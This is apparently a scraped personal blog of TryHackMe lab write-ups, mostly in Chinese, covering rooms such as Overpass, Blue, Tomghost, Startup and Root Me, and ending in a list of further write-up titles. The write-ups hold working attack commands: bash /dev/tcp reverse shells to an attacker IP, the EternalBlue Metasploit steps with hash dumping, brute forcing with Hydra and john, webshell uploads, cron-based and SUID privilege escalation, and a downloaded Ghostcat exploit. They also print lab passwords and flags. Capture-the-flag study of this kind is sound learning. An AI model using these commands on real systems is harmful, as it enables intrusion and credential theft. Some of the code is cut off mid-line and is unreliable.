http://10.10.18.8/archive/a-cheers-to-our-it-department/- Born on a Monday, Christened on Tuesday, Married on Wednesday, Took ill on Thursday, Grew worse on Friday, Died on Saturday, Buried on Sunday. That was the end…- 把字串丟去 Google 可以找到這篇文https://en.wikipedia.org/wiki/Solomon_Grundy_(nursery_rhyme)
所以 admin 叫做 Solomon_GrundyCan we find find the email address of the administrator?- 在某篇貼文中http://10.10.18.8/archive/we-are-hiring/貼文者叫做 Jane DoeEmail 是 : JD@anthem.com- 看起來規則是姓名各取一個字，都大寫 @anthem.com那 admin 這個- Solomon_Grundy 就 SG ㄅSG@anthem.com

Flag 們

我覺得這邊的 Flag 也都偏通靈沒有任何 web 技巧可言
就把整個網站繞一圈就能逛完Flag1- http://10.10.18.8/archive/we-are-hiring/
THM{L0L_WH0_US3S_M3T4}Flag2- http://10.10.18.8/
THM{G!T_G00D}Flag4- http://10.10.18.8/archive/a-cheers-to-our-it-department/
THM{AN0TH3R_M3TA}Flag3- http://10.10.18.8/authors/jane-doe/
THM{L0L_WH0_D15}

通靈登入

通靈登入使用帳號 : SG@anthem.com
密碼 : UmbracoIsTheBest!前面 robots.txt 找到ㄉ登入 http://10.10.18.8/umbraco通靈RDP- sudo apt install freerdp2-x11
帳號 : SG
密碼 : UmbracoIsTheBest!
xfreerdp +drives /u:SG /v:10.10.18.8:3389桌面上就有 user.txt-
THM{N00T_NO0T}

提權

開啟顯示隱藏檔案
逛到 c:\backup\restore他沒有讀取權限，但我們可以修改他的權限-
修改後點開可以看到以下字串- ChangeMeBaby1MoreTime
猜測他可能是 admin 密碼使用RDP連 Admin- xfreerdp +drives /u:Administrator /v:10.10.18.8:3389
使用密碼 ChangeMeBaby1MoreTime取得 admin 權限-
THM{Y0U_4R3_1337}

Pickle Rick (Try Hack Me Writeup)

Thu, 29 Jul 2021 13:11:00 +0800

URL : https://tryhackme.com/room/picklerick
IP: 10.10.223.99

Recon

nmap -A 10.10.223.99
22 port
80 port首頁原始碼-
提示 username : R1ckRul3srobots.txt-
Wubbalubbadubdub

使用 Username : R1ckRul3s
Password : Wubbalubbadubdub

Webshell

進入後就是一個 webshell戳成 reverse shellbash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'Flag1-
在 web 目錄
mr. meeseek hairFlag2-
在 rick 家目錄
1 jerry tearFlag3-
發現可以直接 sudo su
所以就進 root 取得最後一個 flag
fleeb juice

Overpass (Try Hack Me Writeup)

Tue, 27 Jul 2021 13:07:00 +0800

URL : https://tryhackme.com/room/overpass
IP : 10.10.214.180

Scan

首先是老梗的用 Nmap 掃一下nmap -A 10.10.214.180
發現基本上只有開 ssh 跟 http接下來用 dirsearch 掃一下路徑- python3 dirsearch.py -u http://10.10.214.180/ -e all
看起來基本上比較有趣的只有 /admin/admin 介面- 基本上就是一個滿普通的登入介面，可以輸入帳號或密碼對著登入介面做了一些盲測的 SQLi'or'1'='1 --
之類的都沒有反應

ROT47 (多走的彎路QQ)

- 選到 About 看了一下，簡介是說他們曾經因為密碼在 rockyou 裡面，所以感到很失望，創了一個密碼管理軟體到 Downloads 來看一下他們的密碼軟體- 他們有 source code
http://10.10.129.94/downloads/src/overpass.go
擷取重點發現- 是一個用 Go 語言寫的密碼管理軟體，而他們的加密使用了 ROT47 的加密算法

//Secure encryption algorithm from https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example
func rot47(input string) string {
 var result []string
 for i := range input[:len(input)] {
 j := int(input[i])
 if (j >= 33) && (j

```python
def rot47(s):
 x = []
 for i in range(len(s)):
 j = ord(s[i])
 if j >= 33 and j 我心裡的猜想- 它們之前的密碼是用 rockyou 的密碼，現在在推他們自己的密碼管理軟體，使用 ROT47
- 該不會……可以爆破 web 介面密碼，使用 ROT47 後的 rockyou 吧?
- 所以寫了以下的 Code 來把 rockyou 轉 ROT47

```python
def rot47(s):
 x = []
 for i in range(len(s)):
 j = ord(s[i])
 if j >= 33 and j 所以就把所有的使用者準備成一個 txt (每個人名換一行)使用 Hydra 進行爆破- `hydra -L user_l.txt -P rot47rock.txt 10.10.214.180 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect credentials"`跑ㄌ很久也沒用沒用QQ

## 觀察登入程式碼

- 爆破畢竟是下下策，還是先觀察一下登入介面的原始碼有什麼東東
- 就發現了一個 login.jshttp://10.10.214.180/login.js
- 擷取重要的弱點- 跑到 elase 代表登入成功，會寫入一個餅乾餅乾名稱 : "SessionToken"
- 餅乾值 : statusOrCookie

```javascript
if (statusOrCookie === "Incorrect credentials") {
 loginStatus.textContent = "Incorrect Credentials"
 passwordBox.value=""
 } else {
 Cookies.set("SessionToken",statusOrCookie)
 window.location = "/admin"
 }

直接用 Firefox 新增一個餅乾名稱用 “SessionToken”， Value 亂寫
然後就登進去了!!!
上面直接留了一串 Private Key，也寫說是給 james 的

那我們當然就把這一串存到自己的電腦，再嘗試 run 看看囉!!chmod 600 James_key.pem
ssh james@10.10.214.180 -i James_key.pem
發現 key 需要用密碼!爆密碼- 老梗，請約翰出場，先找 ssh2john 把 key 轉 john 的格式python3 ../ssh2john.py James_key.pem > James_john.txt再來就 run john 囉!john James_john.txt --wordlist=/opt/rockyou.txt- 密碼就出來囉!!
james13
(其實我先跑了 rot47 的密碼，但失敗了QQ)使用 ssh 進行登入- ssh james@10.10.214.180 -i James_key.pem
搭配密碼 james13
成功登入!
取得 user.txt``thm{65c1aaf000506e56996822c6281e6bf7}

提權

之前我們都用 Linenum，這次來換換口味，使用小豌豆 Linpeas 吧!先把檔案 scp 上去
scp -i James_key.pem ../linpeas.sh james@10.10.214.180:/home/james馬上就噴出了一個很重要的 Cron job- 小豌豆好棒棒!!!
每分鐘會用 root 權限 curl 一次 overpass.thm 的網址，然後把值丟去bash發現 /etc/hosts 沒有設權限- 所以我們可以把 overpass.thm 轉到自己的伺服器上
在自己的電腦上準備一個資料夾路徑- downloads/src/buildscript.sh 的檔案
內容物為自己的 Reverse shellbash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'然後在自己的電腦上開一下 nc 進行監聽- nc -vlk 7877
開啟 Python server- python3 -m http.server攻擊戳回來了!!!-
取得 root flag-
thm{7f336f8c359dbac18d54fdd64ea753bb}

Blue (Try Hack Me Writeup)

Sun, 25 Jul 2021 23:54:00 +0800

URL : https://tryhackme.com/room/blue
IP : 10.10.158.118

Recon

Q: How many ports are open with a port number under 1000?nmap -p 1-1000 10.10.158.118
回傳 3 個135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds老規矩習慣的 nmap -A 10.10.158.118 看看- Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)- nmap 看到的 Windows7 版本拿去 Googlewindows 7 professional 7601 service pack 1 exploit就會出現 MS17-010 EternalBlue

Metasploit

開啟 msfconsole搜尋 search MS17-010
選擇 exploit/windows/smb/ms17_010_eternalblue輸入 use exploit/windows/smb/ms17_010_eternalblue- 輸入 show options
設定需要的 optionsset RHOSTS 10.10.158.118
set LHOST 10.14.7.198輸入 set payload windows/x64/shell/reverse_tcp輸入 exploit- 成功拿到 shell!
輸入 whoami 可以發現，其實已經是 system 權限了

使用 Meterpreter

存參https://paper.seebug.org/29/簡單來說，Meterpreter是提供給"後滲透"使用- 也就是說，比起cmd有更多方便的功能醬子
例如 getsystem 可自動提權Google shell_to_meterpreter- 取得 post/multi/manage/shell_to_meterpreter``use post/multi/manage/shell_to_meterpreter- show options
set LHOST 10.14.7.198
確定剛剛我們 ctrl + z 的 session輸入 sessions
set SESSION 1``run- 輸入 sessions- 可以看到目前有兩個 session
選第 2 個輸入 sessions 2進入 shell- 輸入 shell
輸入 whoami確定目前自己是 nt authority\system按下 Ctrl + Z 回到 Meterpreter 選單- 輸入 ps 觀察目前系統執行的 process尋找最後一個 process3056 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe輸入 migrate 3056 遷移到 PID 上輸入 hashdump- 可以看到不同使用者的 hash
看起來一般的使用者應該是 Jon把 Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: 存成 txt 用 john 來破- john jon.txt --format=NT --wordlist=/opt/rockyou.txt
1 秒鐘就爆出來ㄌ alqfna22

各種 Flag

Flag1? This flag can be found at the system root.type flag1.txt``flag{access_the_machine}Flag2? This flag can be found at the location where passwords are stored within Windows.- 他說 Flag 存在 Windows 存密碼的地方
Windows 的密碼 hash 存在 C:\Windows\System32\config
裡面有 `type flag2.txt``flag{sam_database_elevated_access}flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.- 其實我覺得這裡有一點點暴力，但這一題真的有點通靈
已經發現前兩隻 flag 檔名是 flag1.txt , flag2.txt
所以我想說直接在 C槽根目錄爆搜dir flag*.txt /s /p
然後就噴出來ㄌ www
flag{admin_documents_can_be_valuable}
這也提醒我們，可以觀察使用者的 Documents 或 Desktop但據我所知大多數的台灣人並沒有用 “我的文件” ㄉ習慣 www

Basic Pentesting (Try Hack Me Writeup)

Sat, 24 Jul 2021 23:51:00 +0800

URL : https://tryhackme.com/room/basicpentestingjt

Target IP : 10.10.165.235

Scanning

nmap -A 10.10.165.235

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
 |_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
 |_nbstat: NetBIOS name: BASIC2, NetBIOS user: , NetBIOS MAC: (unknown)
 | smb-os-discovery:
 | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
 | Computer name: basic2
 | NetBIOS computer name: BASIC2\x00
 | Domain name: \x00
 | FQDN: basic2
 |_ System time: 2021-07-24T04:41:05-04:00
 | smb-security-mode:
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 | smb2-security-mode:
 | 2.02:
 |_ Message signing enabled but not required
 | smb2-time:
 | date: 2021-07-24T08:41:04
 |_ start_date: N/A

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds

The open port is22 SSHOpenSSH 7.2p2 - Username Enumeration80 HTTP- Apache/2.4.18 : no vulnerability139、445 SMB- Samba smbd 4.3.11-Ubuntu : no vulnerability8009 AJP138080 Tomcat

Access Website (80 port)

Use dirsearchpython3 dirsearch.py -u http://10.10.165.235/ -e allQuestion1 : What is the name of the hidden directory on the web server(enter name without /)?- developmentAfter access the development page, we can get 2 files-
They are some mail from J and K to talk about some upgrade smb issue.

Try to find the username

enum4linux 10.10.165.235 -a
So there are 2 username we findkay and janAlthough the verison of SSH services is 7.2p2, it has a vulnerability with Username Enumeration- https://www.exploit-db.com/exploits/40136
But I have tried and it doesn’t work

What is the password?

We need to burp force the password for these 2 users
Use hydra to check with rockyou.txthydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235
hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
We find the password : armando with user jan

ssh jan@10.10.165.235
We are login with jan, but we can’t cat /home/kay/pass.bakAnd then we find some cool things at `/home/kay/.ssh‵-
This is the login key file he/she forgot to remove, so we can login with ssh without password, we can try to scp it to our computer by scp -r jan@10.10.165.235:/home/kay/.ssh .Use ssh command to try to login with kay- chmod 600 id_rsa
ssh kay@10.10.165.235 -i id_rsa
But the key file needs password, so we need to crak

Crack ssh key

Use ssh2john
python ssh2john.py id_rsa > john_sshRun john with wordlist rockyou- john john_ssh --wordlist=/opt/rockyou.txt
So password is beeswax

And we can find the final flag!heresareallystrongpasswordthatfollowsthepasswordpolicy

Final Screenshot

Tomghost (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:28:00 +0800

URL : https://tryhackme.com/room/tomghost

IP : 10.10.9.138

Scanning

nmap -A 10.10.9.138
有開的 port22 SSH 7.2ps
53 tcpwarpped
8009 AJP13 1.3
8080 Tomcat 9.0.30

Exploit

使用 searchsploit 搜尋 AJPsearchsploit AJP
可以找到 Apache Tomcat - AJP 'Ghostcat File Read/Inclusionhttps://www.exploit-db.com/exploits/48143`wget https://www.exploit-db.com/download/48143``mv 48143 48143.py``python 48143.py`-
就直接噴出帳號密碼ㄌ帳號 : skyfuck
密碼 : 8730281lkjlkjdqlksalks

SSH 進去晃晃

ssh skyfuck@10.10.9.138
發現家目錄裡面有兩個檔案
先抓出來scp -r skyfuck@10.10.9.138:/home/skyfuck .在 /home/merlin 發現 user.txt- THM{GhostCat_1s_so_cr4sy}

暴力破解 pgp

看到一個 asc 檔案跟一個 pgp 檔案用 file 觀察他們在幹嘛
.pgp 是加密後ㄉ東西
.asc 的是 private keypgp 轉 john- gpg2john tryhackme.asc > john_gpg
備註 : gpg 是開源版本的 pgpref :　https://zh.wikipedia.org/wiki/PGP我們要破的是 .asc 的 private key 檔案求密碼用 john 爆破，With rockyou.txt- john john_gpg --wordlist=/opt/rockyou.txt
破出密碼為 alexandru``gpg --decrypt credential.pgp- 輸入密碼
取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

提權

su merlin輸入密碼sudo -l- (root : root) NOPASSWD: /usr/bin/zip
發現有 zip 的 sudo 權限到 GTFOBins 找 zip 提權方法- 可以 sudo 的TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'提權成功-
root.txt : THM{Z1P_1S_FAKE}

Startup (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:22:00 +0800

URL : https://tryhackme.com/room/startup
Target IP : 10.10.37.216

Scan

老規矩 nmap 起手式nmap -A 10.10.37.216
有開21 FTPnmap 說 Anonymous allow22 SSH80 網頁掃網頁路徑- python3 dirsearch.py -u http://10.10.37.216/ -e all
可能有用的路徑http://10.10.37.216/files/裡面有一段話，跟 meme

FTP

ftp 10.10.37.216帳號 : Anonymous
密碼 : 空白
發現路徑就是網頁伺服器的files嘗試上傳檔案- 根目錄(網頁的 files)
沒有權限ftp 目錄-
有權限ㄌ!

Shell

訪問 http://10.10.37.216/files/ftp/b374k.php使用預設密碼轉用 Reverse Shell- 本地端準備 nc -vlk 7877
在 Terminal 輸入 bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'切換為交互式 shell- python -c 'import pty; pty.spawn("/bin/bash")'

亂逛系統

根目錄底下recipe.txt``Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
問題 : What is the secret spicy soup recipe?
答案 : loveincidents 資料夾- 裡面有 suspicious.pcapng
透過 webshell 把他載下來備用使用者相關- /home 底下有 lennie 使用者

解析 pcap

觀察第 45 個封包 follow TCP stream可以看到 webshell 的紀錄
其中輸入了密碼 c4ntg3t3n0ughsp1c3

嘗試登入使用者

回到 reverse shell 輸入 su lennie 並搭配上述密碼
登入成功!!取得 user.txt-
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}

研究提權

在使用者資料夾裡找到 scripts 資料夾
兩個檔案權限都是 root，但我們可以進行讀取
planner.sh看起來會把環境變數 $LIST 給寫到 startup_list.txt接著呼叫 /etc/print.sh

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

觀察 /etc/print.sh 可以發現我們有 write 的權限-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh在 print.sh 下面加上一行 reverse shell- echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
當然這邊的 port 要跟目前的不同，然後本地開 nc -vlk 8778 來聽
然後連指令都還沒執行，就莫名地拿到 root ㄌ ?__?
THM{f963aaa6a430f210222158ae15c3d76d}

為什麼誤打誤撞拿到 root ㄌ，還是要來研究一下

跑 Linpeas準備 linpeas.sh 在本地python3 -m http.server回到使用者端- wget 10.14.7.198:8000/linpeas.sh
bash linpeas.sh | tee meow.txt看不出什麼結果使用 Pspy- 用上述同樣方法載到被駭機觀察
發現每分鐘都會用 UID=0 執行一次 planner.sh
所以應該是一個 root 的 cron job進入root後- 輸入 crontab -l
就能看到這條 cron job 了我還是覺得這一段有一點點通靈 QQ

Root Me (Try Hack Me Writeup)

Sat, 24 Jul 2021 13:15:00 +0800

題目網址 : https://tryhackme.com/room/rrootme

目標IP : 10.10.233.205

Scanning

起手式 nmapnmap -A 10.10.233.205
22 : SSH7.6p1 有枚舉的漏洞 CVE-2018-15473
https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py80 : Apache- Apache httpd 2.4.29nmap 掃描的同一時間，先打開網頁看看-
網頁起手式 dirsearchpython3 dirsearch.py -u http://10.10.233.205/ -e all
看起來可能會有趣的路徑/panel/
/uploads/

上傳 webshell

/panel/ 可以上傳檔案
用 Wappalyzer 可以確定他是 PHP上傳個 b374k.php-
會噴錯，Google翻譯說 PHP是不允許的！ (葡萄牙文)使用 php 副檔名解析漏洞測試- Apache 1.x 2.x 文件解析特性BJ4測試檔名 b374k.php.aaa- Google 翻譯 :文件上傳成功！

使用 Webshell

點下面的 Veja! 會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
使用預設密碼就能進入 shell

戳入 Reverse Shell

Webshell 滿好用的，但是Reverse shell用起來更爽確認攻擊機 ip 為 10.14.7.198終端機輸入 nc -vlk 7877webshell 的 Terminal 輸入- bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'即可順利連上 Reverse shell- 輸入指令讓他變得更 interactive 一點- python -c 'import pty; pty.spawn("/bin/bash")'

在電腦裡面逛大街

user.txt
THM{y0u_g0t_a_sh3ll

設法提權

使用內建的上傳功能上傳 LinEnum.sh開權限 chmod +x LinEnum.sh
執行，並存到檔案 ./LinEnum.sh | tee meow.txt
基本上優先注意紅色、橘色的東西找到有趣ㄉ東西!! [+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python- 也就是說 /usr/bin/python 可以用 SUID 執行
到 GTFOBins 找 Python 有 SUID 的提權方法python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

提權成功!!

Flag : THM{pr1v1l3g3_3sc4l4t10n}

Try Hack Me on Steven Meow's Blog 🐱

Solar, exploiting log4j (Try Hack Me Writeup)

Recon

Discovery

Battery (Try Hack Me Writeup)

Recon

Web

Reverse

Web

SSH

提權

另外一種提權法

學到ㄌ

Windows Fundamentals 1 (Try Hack Me Writeup)

Task 1 Introduction to Windows

Task 2 Windows Editions

Task 3 The Desktop (GUI)

Task 4 The File System

Alternate Data Streams (ADS)

Task 5 The Windows\System32 Folders

Task 6 User Accounts, Profiles, and Permissions

Task 7 User Account Control

Task 8 Settings and the Control Panel

Task 9 Task Manager

Task 10 Conclusion

VulnNet (Try Hack Me Writeup)

Recon

提權

二次提權

Sustah (Try Hack Me Writeup)

Recon

爆數字

CMS

提權

二次提權

Madeye Castle (Try Hack Me Writeup)

Recon

SQLi

SSH

提權

二次提權

Looking Glass (Try Hack Me Writeup)

Recon

SSH

提權

二次提權

Bounty Hacker (Try Hack Me Writeup)

Recon

FTP Anonymous login

爆破密碼

提權

Overpass 3 (Try Hack Me Writeup)

Recon

GPG 解密

爆破密碼

FTP 2 Webshell

提權

二次提權

學到ㄌ

The Marketplace (Try Hack Me Writeup)

Recon

XSS

SQLi

SSH

提權

二次提權

Source (Try Hack Me Writeup)

Scan

Exploit

Anonymous (Try Hack Me Writeup)

Recon

嘗試 Exploit

提權

心得

Relevant (Try Hack Me Writeup)

Recon

觀察網頁

觀察 SMB

搜尋更多的 Port

通靈掃描QQ